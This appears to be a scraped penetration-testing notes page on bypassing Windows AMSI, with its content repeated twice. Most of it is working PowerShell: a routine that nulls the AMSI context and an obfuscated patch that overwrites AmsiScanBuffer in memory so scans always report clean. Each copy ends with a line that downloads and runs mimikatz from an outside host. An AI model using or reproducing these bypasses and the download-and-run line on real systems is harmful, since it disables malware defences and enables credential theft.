Bypassing AMSI

Windows Antimalware Scan Interface (AMSI) allows any program to communicate with the Anti-Virus that communicates on the machine. Essentially a bunch of functions that programs can call (amsi.dll). This allows programs to be like hey amsi scan this file, then amsi will be like or

Its built into PowerShell by default. So even though we're running scripts into memory, it's still getting passed through PowerShell which has AMSI so it stops the process from even happening.

AMSI Scan Buffer

With this technique, when amsi.dll gets loaded into memory we are going to find the location of the amsi scan buffer function and overwrite it in a way that makes it always return a clean file.

Test amsi

Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"

Clear the amsi context

$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
$d = $c.GetFields('NonPublic,Static')
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
$g = $f.GetValue($null)
[IntPtr]$ptr = $g
[Int32[]]$buf = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

#Rasta-mouses Amsi-Scan-Buffer patch \n
$vahqn = @"
using System;
using System.Runtime.InteropServices;
public class vahqn {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr kyjgnt, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $vahqn

$kpvseop = [vahqn]::LoadLibrary("$([CHaR](97+37-37)+[chAr](109*100/100)+[Char]([ByTe]0x73)+[cHAr]([BytE]0x69)+[chAR](46+41-41)+[ChAr](100+67-67)+[CHAr]([ByTE]0x6c)+[ChAr]([byte]0x6c))")
$mgciek = [vahqn]::GetProcAddress($kpvseop, "$([cHaR]([ByTe]0x41)+[ChaR](109)+[ChAR]([BYTE]0x73)+[CHar](105+77-77)+[chAR](83+57-57)+[Char](99*6/6)+[CHar]([BYtE]0x61)+[CHAR](60+50)+[Char](66)+[cHAr]([bYTe]0x75)+[cHar]([BYtE]0x66)+[ChaR](102)+[CHAr]([BYTE]0x65)+[char](114*111/111))")
$p = 0
[vahqn]::VirtualProtect($mgciek, [uint32]5, 0x40, [ref]$p)
$cvgm = "0xB8"
$qqvf = "0x57"
$whib = "0x00"
$mvnn = "0x07"
$djza = "0x80"
$hgrw = "0xC3"
$cxgkz = [Byte[]] ($cvgm,$qqvf,$whib,$mvnn,+$djza,+$hgrw)
[System.Runtime.InteropServices.Marshal]::Copy($cxgkz, 0, $mgciek, 6)

Anything we run that doesn't touch the disk wont be caught by Windows Defender.

Any and all EDR solutions will catch this even if AMSI is bypassed

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')

AMSI.Fail

Amsi.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. So once your PowerShell process dies the AMSI bypass dies with it. This makes it better on real engagements because then you're not just disabling WIndows Defender

PreviousAV Evasion NextBypassing UAC

Last updated 10 months ago

Was this helpful?

AMSI Scan Buffer

Test amsi

Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"

Clear the amsi context

$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
$d = $c.GetFields('NonPublic,Static')
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
$g = $f.GetValue($null)
[IntPtr]$ptr = $g
[Int32[]]$buf = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

#Rasta-mouses Amsi-Scan-Buffer patch \n
$vahqn = @"
using System;
using System.Runtime.InteropServices;
public class vahqn {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr kyjgnt, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $vahqn

$kpvseop = [vahqn]::LoadLibrary("$([CHaR](97+37-37)+[chAr](109*100/100)+[Char]([ByTe]0x73)+[cHAr]([BytE]0x69)+[chAR](46+41-41)+[ChAr](100+67-67)+[CHAr]([ByTE]0x6c)+[ChAr]([byte]0x6c))")
$mgciek = [vahqn]::GetProcAddress($kpvseop, "$([cHaR]([ByTe]0x41)+[ChaR](109)+[ChAR]([BYTE]0x73)+[CHar](105+77-77)+[chAR](83+57-57)+[Char](99*6/6)+[CHar]([BYtE]0x61)+[CHAR](60+50)+[Char](66)+[cHAr]([bYTe]0x75)+[cHar]([BYtE]0x66)+[ChaR](102)+[CHAr]([BYTE]0x65)+[char](114*111/111))")
$p = 0
[vahqn]::VirtualProtect($mgciek, [uint32]5, 0x40, [ref]$p)
$cvgm = "0xB8"
$qqvf = "0x57"
$whib = "0x00"
$mvnn = "0x07"
$djza = "0x80"
$hgrw = "0xC3"
$cxgkz = [Byte[]] ($cvgm,$qqvf,$whib,$mvnn,+$djza,+$hgrw)
[System.Runtime.InteropServices.Marshal]::Copy($cxgkz, 0, $mgciek, 6)

Anything we run that doesn't touch the disk wont be caught by Windows Defender.

Any and all EDR solutions will catch this even if AMSI is bypassed

IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')